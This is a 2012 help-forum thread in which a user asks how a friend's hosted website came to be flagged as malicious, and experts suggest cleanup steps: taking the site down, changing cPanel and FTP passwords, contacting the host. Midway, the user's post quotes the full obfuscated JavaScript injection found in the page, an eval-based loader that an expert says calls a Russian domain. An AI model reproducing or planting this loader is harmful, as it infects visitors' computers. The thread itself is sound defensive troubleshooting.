[Last Call] Learn how to a build a cloud-first strategyRegister Now

x
?
Solved

A website was hacked? How do I explain it to the client?

Posted on 2012-08-20
20
Medium Priority
?
886 Views
Last Modified: 2013-11-22
I helped a friend set up a website on a big shared hosting web service.  He contacted me today saying when someone googles his domain, then follows the link, he gets a Google Malware page saying:

Warning - visiting this web site may harm your computer!
Suggestions:
Return to the previous page and pick another result.
Try another search to find what you're looking for.
Or you can continue to http://loumarinc.com/ at your own risk. For detailed information about the problems we found, visit Google's Safe Browsing diagnostic page for this site.

For more information about how to protect yourself from harmful software online, you can visit StopBadware.org.

If you are the owner of this web site, you can request a review of your site using Google's Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

I go to the home page directly and my microsoft security essentials says your machine was just cleaned. Viewing source, I get access denied till I turn off MSE.

Then the view source shows this besides the usual text.:

Warning - visiting this web site may harm your computer!
Suggestions:
Return to the previous page and pick another result.
Try another search to find what you're looking for.
Or you can continue to http://loumarinc.com/ at your own risk. For detailed information about the problems we found, visit Google's Safe Browsing diagnostic page for this site.

For more information about how to protect yourself from harmful software online, you can visit StopBadware.org.

<body bgcolor="#C0C0C0" link="#0000FF" vlink="#0000FF" alink="#0000FF" onload="FP_preloadImgs(/*url*/'button8.jpg',/*url*/'button9.jpg',/*url*/'buttonB.jpg',/*url*/'buttonC.jpg',/*url*/'button17.jpg',/*url*/'button18.jpg',/*url*/'button2C.jpg',/*url*/'button2D.jpg',/*url*/'button2F.jpg',/*url*/'button30.jpg',/*url*/'button2.jpg',/*url*/'button3.jpg',/*url*/'button26.jpg',/*url*/'button25.jpg',/*url*/'button28.jpg',/*url*/'button29.jpg')"><!--c3284d--><script>try{n|=Math.round;}catch(zxc){if(020==0x10)e=eval;m=Math;n="1428..1755..1540..1485..1624..1575..1554..1650..448..1650..1414..1800..1624..1230..1358..1650..1400..1665..1526..1170..1638..1635..1372..1515..1596..600..574..1845..182..150..448..480..448..480..1652..1455..1596..480..1456..1575..448..915..448..1740..1456..1575..1610..690..1610..1515..1414..1500..448..705..448..1740..1456..1575..1610..690..1134..885..182..150..448..480..448..480..1652..1455..1596..480..1512..1665..448..915..448..1740..1456..1575..1610..690..1610..1515..1414..1500..448..555..448..1740..1456..1575..1610..690..1134..885..182..150..448..480..448..480..1652..1455..1596..480..1624..1515..1610..1740..448..915..448..1740..1456..1575..1610..690..910..480..588..480..1512..1665..448..675..448..1740..1456..1575..1610..690..1148..480..588..480..1456..1575..826..195..140..480..448..480..448..1575..1428..600..1624..1515..1610..1740..448..930..448..720..574..1845..182..150..448..480..448..480..448..480..448..480..1624..1560..1470..1725..644..1725..1414..1515..1400..480..854..480..1624..1515..1610..1740..826..195..140..480..448..480..448..1875..448..1515..1512..1725..1414..480..1722..195..140..480..448..480..448..480..448..480..448..1740..1456..1575..1610..690..1610..1515..1414..1500..448..915..448..1740..1414..1725..1624..480..602..480..1624..1560..1470..1725..644..1155..826..195..140..480..448..480..448..1875..182..150..448..480..448..480..1596..1515..1624..1755..1596..1650..448..600..1624..1560..1470..1725..644..1725..1414..1515..1400..480..588..480..1624..1560..1470..1725..644..1665..1540..1515..1106..1770..1414..1710..1078..615..826..195..140..1875..182..150..182..150..1428..1755..1540..1485..1624..1575..1554..1650..448..1230..1358..1650..1400..1665..1526..1170..1638..1635..1372..1515..1596..1065..1414..1650..1414..1710..1358..1740..1554..1710..560..1755..1540..1575..1680..615..1722..195..140..480..448..480..448..1770..1358..1710..448..1500..448..915..448..1650..1414..1785..448..1020..1358..1740..1414..600..1638..1650..1470..1800..588..735..672..720..672..615..826..195..140..480..448..480..448..1770..1358..1710..448..1725..448..915..448..1155..1358..1740..1456..690..1386..1515..1470..1620..560..1500..644..1545..1414..1740..1008..1665..1638..1710..1610..600..574..705..714..615..826..195..140..480..448..480..448..1740..1456..1575..1610..690..1610..1515..1414..1500..448..915..448..750..714..780..742..810..770..840..798..720..686..480..602..480..560..1500..644..1545..1414..1740..1078..1665..1540..1740..1456..600..574..480..588..480..672..1800..980..1050..980..1050..980..1050..574..480..602..480..560..1500..644..1545..1414..1740..952..1455..1624..1515..560..615..448..630..448..720..1680..1050..980..1050..980..615..602..480..560..1155..1358..1740..1456..690..1596..1665..1638..1650..1400..600..1610..480..588..480..672..1800..980..1050..980..615..574..885..182..150..448..480..448..480..1624..1560..1470..1725..644..975..448..915..448..780..784..750..770..735..826..195..140..480..448..480..448..1740..1456..1575..1610..690..1078..480..854..480..700..735..728..825..728..840..714..810..728..825..826..195..140..480..448..480..448..1740..1456..1575..1610..690..1134..480..854..480..1624..1560..1470..1725..644..1155..448..705..448..1740..1456..1575..1610..690..910..885..182..150..448..480..448..480..1624..1560..1470..1725..644..1230..448..915..448..1740..1456..1575..1610..690..1078..480..518..480..1624..1560..1470..1725..644..975..826..195..140..480..448..480..448..1740..1456..1575..1610..690..1554..1650..1414..1185..1652..1515..1596..1155..448..915..448..735..644..720..448..705..448..1740..1456..1575..1610..690..1078..885..182..150..448..480..448..480..1624..1560..1470..1725..644..1650..1414..1800..1624..480..854..480..1540..1515..1680..1740..1148..1455..1540..1500..1554..1635..1092..1755..1526..1470..1414..1710..826..195..140..480..448..480..448..1710..1414..1740..1638..1710..1540..480..1624..1560..1470..1725..826..195..140..1875..182..150..182..150..1428..1755..1540..1485..1624..1575..1554..1650..448..1485..1596..1515..1358..1740..1414..1230..1358..1650..1400..1665..1526..1170..1638..1635..1372..1515..1596..600..1596..660..448..1155..1470..1650..616..480..1078..1455..1680..615..1722..195..140..480..448..480..448..1710..1414..1740..1638..1710..1540..480..1078..1455..1624..1560..644..1710..1554..1755..1540..1500..560..600..1078..1455..1680..675..1078..1575..1540..615..448..630..448..1710..644..1650..1414..1800..1624..600..574..480..602..480..1078..1575..1540..615..826..195..140..1875..182..150..182..150..1428..1755..1540..1485..1624..1575..1554..1650..448..1545..1414..1650..1414..1710..1358..1740..1414..1200..1610..1515..1638..1500..1554..1230..1358..1650..1400..1665..1526..1245..1624..1710..1470..1650..1442..600..1638..1650..1470..1800..616..480..1512..1515..1540..1545..1624..1560..616..480..1708..1665..1540..1515..574..1845..182..150..448..480..448..480..1652..1455..1596..480..1596..1455..1540..1500..448..915..448..1650..1414..1785..448..1230..1358..1650..1400..1665..1526..1170..1638..1635..1372..1515..1596..1065..1414..1650..1414..1710..1358..1740..1554..1710..560..1755..1540..1575..1680..615..826..195..140..480..448..480..448..1770..1358..1710..448..1620..1414..1740..1624..1515..1596..1725..448..915..448..510..1372..1755..1358..1800..1554..1695..1414..1710..1470..1695..1666..1605..1442..1530..1498..1500..1694..1515..1540..1830..1554..1725..1610..1695..1512..1800..1428..1695..1358..1815..1652..1680..1596..510..644..1725..1568..1620..1470..1740..560..585..546..615..826..195..140..480..448..480..448..1770..1358..1710..448..1725..1624..1710..448..915..448..585..546..885..182..150..126..1530..1554..1710..560..1770..1358..1710..448..1575..448..915..448..720..826..480..1470..480..840..480..1512..1515..1540..1545..1624..1560..826..480..1470..480..602..645..448..615..1722..195..140..480..448..480..448..480..448..480..448..1725..1624..1710..448..645..854..480..1512..1515..1624..1740..1414..1710..1610..1365..1386..1710..1414..1455..1624..1515..1148..1455..1540..1500..1554..1635..1092..1755..1526..1470..1414..1710..560..1710..1358..1650..1400..660..448..720..616..480..1512..1515..1624..1740..1414..1710..1610..690..1512..1515..1540..1545..1624..1560..448..675..448..735..574..1395..826..195..140..480..448..480..448..1875..182..150..448..480..448..480..1596..1515..1624..1755..1596..1650..448..1725..1624..1710..448..645..448..585..644..585..448..645..448..1830..1554..1650..1414..885..182..150..1750..195..140..195..140..1725..1414..1740..1022..1650..1624..1515..1596..1770..1358..1620..560..1530..1638..1650..1386..1740..1470..1665..1540..600..574..1845..182..150..448..480..448..480..1624..1710..1694..1845..182..150..448..480..448..480..448..480..448..480..1470..1530..560..1740..1694..1680..1414..1665..1428..480..1470..1530..1596..1455..1526..1515..1218..1455..1610..1005..1596..1515..1358..1740..1414..1500..448..915..854..480..476..1755..1540..1500..1414..1530..1470..1650..1414..1500..476..615..1722..195..140..480..448..480..448..480..448..480..448..480..448..480..448..1770..1358..1710..448..1755..1540..1575..1680..480..854..480..1078..1455..1624..1560..644..1710..1554..1755..1540..1500..560..645..1540..1515..1666..480..952..1455..1624..1515..560..615..658..735..672..720..672..615..826..480..448..480..448..480..448..480..448..480..448..480..448..480..1652..1455..1596..480..1400..1665..1526..1455..1470..1650..1092..1455..1526..1515..448..915..448..1545..1414..1650..1414..1710..1358..1740..1414..1200..1610..1515..1638..1500..1554..1230..1358..1650..1400..1665..1526..1245..1624..1710..1470..1650..1442..600..1638..1650..1470..1800..616..480..686..810..616..480..546..1710..1638..585..574..885..448..480..448..480..448..480..448..480..448..480..448..480..1470..1530..1596..1635..448..915..448..1500..1554..1485..1638..1635..1414..1650..1624..690..1386..1710..1414..1455..1624..1515..966..1620..1414..1635..1414..1650..1624..600..476..1095..980..1230..910..1155..966..510..574..885..448..195..140..480..448..480..448..480..448..480..448..480..448..480..448..1575..1428..1710..1526..690..1610..1515..1624..975..1624..1740..1596..1575..1372..1755..1624..1515..560..510..1610..1710..1386..510..616..480..476..1560..1624..1740..1568..870..658..705..476..645..1400..1665..1526..1455..1470..1650..1092..1455..1526..1515..602..510..658..1575..1540..690..1386..1545..1470..945..686..795..476..615..826..480..182..150..448..480..448..480..448..480..448..480..448..480..448..480..1470..1530..1596..1635..644..1725..1624..1815..1512..1515..644..1785..1470..1500..1624..1560..448..915..448..510..672..1680..1680..510..826..480..182..150..448..480..448..480..448..480..448..480..448..480..448..480..1470..1530..1596..1635..644..1725..1624..1815..1512..1515..644..1560..1414..1575..1442..1560..1624..480..854..480..476..720..1568..1800..476..885..448..195..140..480..448..480..448..480..448..480..448..480..448..480..448..1575..1428..1710..1526..690..1610..1740..1694..1620..1414..690..1652..1575..1610..1575..1372..1575..1512..1575..1624..1815..448..915..448..510..1456..1575..1400..1500..1414..1650..476..885..448..195..140..480..448..480..448..480..448..480..448..480..448..480..448..1500..1554..1485..1638..1635..1414..1650..1624..690..1372..1665..1400..1815..644..1455..1568..1680..1414..1650..1400..1005..1456..1575..1512..1500..560..1575..1428..1710..1526..615..826..195..140..135..126..135..1470..1530..1596..1455..1526..1515..1218..1455..1610..1005..1596..1515..1358..1740..1414..1500..448..915..448..1740..1596..1755..1414..885..182..150..448..480..448..480..448..480..448..480..1750..195..140..480..448..480..448..1875..1386..1455..1624..1485..1456..600..1414..615..1722..1575..1428..1710..1358..1635..1414..1305..1358..1725..938..1710..1414..1455..1624..1515..1400..480..854..480..1638..1650..1400..1515..1428..1575..1540..1515..1400..885..1750..195..140..1875..616..480..686..720..672..615..826".split("..");h=2;s="";for(i=0;i-1769!=0;i=1+i){k=i;s+=String["fromCharCode"](n[k]/(i-h*Math.floor(i/h)+016));}if(016-0xb===3)if(window.document)e(""+s);}</script><!--/c3284d-->
 
Is this the malware? How would you think this got into the home page?  from them having a cpanel easy to guess password?  The server was hacked from another account? what can we do about that?
0
Comment
  • 8
  • 5
  • 4
  • +2
20 Comments
 
LVL 9

Expert Comment

by:Evan Cutler
ID: 38313936
just for silliness...
 http://loumarinc.com/

is the actual link to your friends site, yes?
0
 

Author Comment

by:BeGentleWithMe-INeedHelp
ID: 38313965
yes.
0
 
LVL 9

Assisted Solution

by:Evan Cutler
Evan Cutler earned 600 total points
ID: 38313982
well, you need to look at the code from the homepage...
Look in the root folder, make sure there's no re-directs in the folder.
Then check the homepage itself.  is all of the code yours?
Do you recognize all of it?
has anyone tampered with it?
are there any files placed in the root folder you don't know?

Then go into cpanel.
Check the root folder location settings.
make sure no one pushed cpanel to another site.
(usually there's a view site button...press it).

Make sure in CPANEL the domain name is correctly set right in the DNS settings
(domain was purchased else where, check there....)

if all of the above is set right...

it is possible that a word on one of your friends site is on the google "bad word List".  you can use the google developer tools to check to see if there's any bad juju.  After that, you can email google and re-submit the site, and ask them to remove the warning.
0
Cyber Threats to Small Businesses (Part 1)

This past May, Webroot surveyed more than 600 IT decision-makers at medium-sized companies to see how these small businesses perceived new threats facing their organizations.  Read what Webroot CISO, Gary Hayslip, has to say about the survey in part 1 of this 2-part blog series.

 
LVL 58

Assisted Solution

by:Gary
Gary earned 800 total points
ID: 38313984
First thing to do is take the site down.
If you have a backup of the site then delete everything on it.
The site seems to be a fairly static html site.
A quick check on other sites on the same server seems to be clear - so it's probably just your website - so you need to find out how you got infected.
I'm presuming this is shared hosting - contact your host and let them know about it.
I cannot see how they may have injected the code as there doesn't appear to be any method of posting information directly to the site
0
 
LVL 9

Assisted Solution

by:Evan Cutler
Evan Cutler earned 600 total points
ID: 38313988
Agree with Gary....make sure you take it down first...
sorry, lots to do for you..
typing faster than thinking.
0
 
LVL 58

Assisted Solution

by:Gary
Gary earned 800 total points
ID: 38313995
If this is a Linux host then check the .htaccess file for anything suspicious
0
 

Author Comment

by:BeGentleWithMe-INeedHelp
ID: 38314004
How did you guys conclude it's infected?

I was googling some of the code:
<script>try{n|=Math.round;}catch(zxc)

and found a site

http://sitecheck.sucuri.net

that confirms it's infected and this code I suspected is the cause. and lists the pages infected.

Ever hear of them?  Any good?  Other services you use?  They supposedly catch the malware and clean the site!?
0
 
LVL 58

Assisted Solution

by:Gary
Gary earned 800 total points
ID: 38314014
It is a virus/malware trying to infect the visitors pc.
All your pages are infected and until you can determine that this is only on your site you cannot be sure that the malware is gone - you could upload your site again and 5 mins later you're back in the same situation.
You need to contact your host.
0
 
LVL 9

Assisted Solution

by:Evan Cutler
Evan Cutler earned 600 total points
ID: 38314020
That will depend on your faith in the company...
and making sure they are listed in Better Business Bureau and other official locations (in other words, to make sure they are not fake themselves).
0
 
LVL 9

Expert Comment

by:Evan Cutler
ID: 38314023
Gary's right again...give him the points.

Call the host.
0
 
LVL 58

Expert Comment

by:Gary
ID: 38314042
How did you guys conclude it's infected?

Because its got encoded javascript in the page that is trying to infect my pc.
0
 
LVL 58

Expert Comment

by:Gary
ID: 38314061
I've narrowed it down
A call is being made to vqyvqoiayrlunfvy.ru/in.cgi?15
0
 

Author Comment

by:BeGentleWithMe-INeedHelp
ID: 38314069
I have a ticket in with the hosting company, but want to know what to expect - should the host have caught this sooner? I think the hosting co. is good.  Been using them for years, my site and other client's sites test clean with that sucuri service.  Followiung a google link, I see this:

Of the 259454 site(s) we tested on this network over the past 90 days, 13199 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

is 13K (5%) of the sites being infected high for a shared hosting service? Some of those are likely intentional malware, right? A drawback to shared hosting? 1 bad apple spoils the whole bunch?
0
 
LVL 12

Assisted Solution

by:TomRScott
TomRScott earned 400 total points
ID: 38314073
Assuming you are making a valid request for assistance and not trying to spread a trojan by enticing folks to go to a hacked and infected site...

Yes the page is infected.

Your first steps are:

1. Remove or otherwise disable the infected home page for the web site IMMEDIATELY!!!

That is, if you have access to the site anymore.  If the hack was via a compromised password, the password may have been changed.  If your ftp password no longer works, go to Step 2 QUICKLY and return to this step (1).

2. Change the passwords

For CPanel, then for ftp and EVERYTHING else accessable from CPanel INCLUDING any mailboxes, etc.  If your CPanel password was changed by the hacker(s), call your hosting company, you guessed it, IMMEDIATELY, and inform them of the situation requesting their assistance for both Step 1 and Step 2.

3. Post either the original site or a placeholder site

4. Explain the issue in general terms to your friend

The site was hacked.  The password was too simple or otherwise compromised.  If you shared your password with anybody, you need to reconsider HOW you shared the password.  The CPanel password should NOT be shared beyond a VERY select few.  The other passwords were also changed since, they were possibly compromized via CPanel if its password was known by the hackers.  Discuss good practices regarding the creation of passwords and how they should be "documented" in a manner maintaining security.

5. Plan your next moves

Decide if you have an inside problem or a design flaw in your friend's security that leave's their web site or domain open to recurring attacks.  Adjust security as needed.  Repost the site.  You may consider part of that repost a note regarding the recent hack to the site and an appology for any inconvenience.If the site involved is a business site, you should work on fixing any image issues resulting from this incident.

 - Tom
0
 
LVL 58

Expert Comment

by:Gary
ID: 38314126
I would also add that yourself/client should check their own pc - as it is very possible the site was infected as a result of ftp password stealing.
0
 
LVL 58

Expert Comment

by:Gary
ID: 38314190
Hostgator are pretty large and respected enough.
If it was an issue on their end I think they would have caught it before you knew anything about it - would be pretty sure that they have Cpanel and everything updated to eliminate any exploits.
So the reason for the infection probably lies with 'you'.
Simple passwords like DOB that a bot can get into your server with.
Use a service like http://www.strongpasswordcreator.com/ to create a strong password (I personally use minimum 20 character passwords)
5% is not an unreasonable figure for that many sites.
0
 
LVL 54

Assisted Solution

by:Scott Fell, EE MVE
Scott Fell,  EE MVE earned 200 total points
ID: 38314287
I know somewhere jason will call me out on this but the problem you have is typically from a plug in you used with wordpress.  Some plug ins that make it easy for you to use forms, collect user data etc can leave you open.  Many times  the hackers didn't even need to use a password to mess up your site.  It is a plug in that leaves open a security hole.  Since sites like wordpress/joomla are open source, the bad guys already know what to look for.

So disable any wordpress plug ins and disable the ability to allow people to post comments etc.  Then before you put them back, research the plug ins if they have any patches and updates.

Also, a few months ago there was an update released for plesk that also left open a security hole.   Typically, you would think hostgator upgraded and patched.

You can probably simply restore an older database and all will be good - just temporarily get rid of the plug ins until you research them.
0
 
LVL 12

Assisted Solution

by:TomRScott
TomRScott earned 400 total points
ID: 38314293
Also regarding the 5%, you mention "1 bad apple spoils the whole bunch?".  Thay is why hosting services typically invest in "sandboxing" which separates the apples into "bunches of one" minimizing site-to-site infections between sites on the same host or in the same site.  Further, must malware was not work that way anyway.

Most of the infections are introduced by the owners of the sites involved or via a hack directed at the specific site.

Hosted services are often more hardened and usually have 24 hour professionals monitoring the servers involved for a range of possible issues.

Glad to see you replaced the home page.  Hopefully, you have changed the passwords and started working with the hosting company.

Good luck with the rest of your response.

 - Tom
0
 
LVL 58

Accepted Solution

by:
Gary earned 800 total points
ID: 38314360
padas
Don't think its from a plugin - there's only 4 pages on the site and no form submissions not even to contact them.
Though a good point to make sure you have updated the scripts

As an aside
I would remove the link to the Company Email....
0
 

Author Comment

by:BeGentleWithMe-INeedHelp
ID: 38324461
thanks everyone
0

Featured Post

Independent Software Vendors: We Want Your Opinion

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Lease-to-own eliminates the expenditure of hardware replacement and allows you to pay off the server over time. Usually, this is much cheaper than leasing servers. Think of lease-to-own as credit without interest.
When it comes to security, close monitoring is a must. According to WhiteHat Security annual report, a substantial number of all web applications are vulnerable always. Monitis offers a new product - fully-featured Website security monitoring and pr…
The purpose of this video is to demonstrate how to set up the WordPress backend so that each page automatically generates a Mailchimp signup form in the sidebar. This will be demonstrated using a Windows 8 PC. Tools Used are Photoshop, Awesome…
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…

834 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question